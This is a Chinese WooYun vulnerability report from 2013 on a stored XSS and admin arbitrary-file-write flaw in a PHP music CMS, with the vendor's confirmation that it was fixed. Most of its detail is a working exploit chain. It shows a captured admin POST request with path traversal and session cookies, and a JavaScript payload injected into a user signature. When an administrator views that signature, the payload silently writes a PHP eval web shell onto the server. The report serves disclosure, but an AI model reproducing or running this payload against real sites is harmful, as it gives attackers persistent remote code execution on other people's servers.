当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-040127

漏洞标题:程氏舞曲CMSPHP3.0储存型xss与后台任意文件写入漏洞

相关厂商:chshcms.com

漏洞作者: roker

提交时间:2013-10-18 17:33

修复时间:2014-01-16 17:33

公开时间:2014-01-16 17:33

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-10-18: 细节已通知厂商并且等待厂商处理中
2013-10-22: 厂商已经确认,细节仅向厂商公开
2013-10-25: 细节向第三方安全合作伙伴开放
2013-12-16: 细节向核心白帽子及相关领域专家公开
2013-12-26: 细节向普通白帽子公开
2014-01-05: 细节向实习白帽子公开
2014-01-16: 细节向公众公开

简要描述:

插入 构造的js
可 getshell

详细说明:

user/space.php?ac=edit&op=zl
修改 签名处,没有 任何过滤。xss产生
后台 看了下 可以写任意格式文件。。
抓包。。
POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://127.0.0.1/admin/skins/skins.php?ac=xgmb&path=../../skins/index/html/&name=aaa.php
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 127.0.0.1
Content-Length: 38
DNT: 1
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
name=aaa.php&content=%3Cs%3E%3Ca%25%3E
于是 构造js如下。

<script> thisTHost = top.location.hostname;thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";function PostSubmit(url, data, msg) {     var postUrl = url;    var postData = data;     var msgData = msg;     var ExportForm = document.createElement("FORM");     document.body.appendChild(ExportForm);     ExportForm.method = "POST";      var newElement = document.createElement("input");     newElement.setAttribute("name", "name");      newElement.setAttribute("type", "hidden");     var newElement2 = document.createElement("input");     newElement2.setAttribute("name", "content");     newElement2.setAttribute("type", "hidden");     ExportForm.appendChild(newElement);     ExportForm.appendChild(newElement2);     newElement.value = postData;     newElement2.value = msgData;     ExportForm.action = postUrl;     ExportForm.submit(); };PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");


插入 签名处
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
就会 在 skins\index\html\目录下生成 roker.php 一句话。

漏洞证明:

QQ图片20131017235131.jpg

修复方案:

过滤xss

版权声明:转载请注明来源 roker@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2013-10-22 21:17

厂商回复:

感谢作者,漏洞已经修复!

最新状态:

暂无